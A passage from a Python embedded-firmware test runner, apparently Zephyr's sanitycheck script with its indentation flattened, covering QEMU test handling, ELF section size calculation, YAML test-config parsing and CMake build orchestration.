line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
#there is possibility we polled nothing because
#of host not scheduled QEMU process enough CPU
#time during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
#sometimes QEMU can't handle SIGTERM signal correctly
#in that case kill -9 QEMU process directly and leave
#sanitycheck judge testing result by console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
self.returncode = 0
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
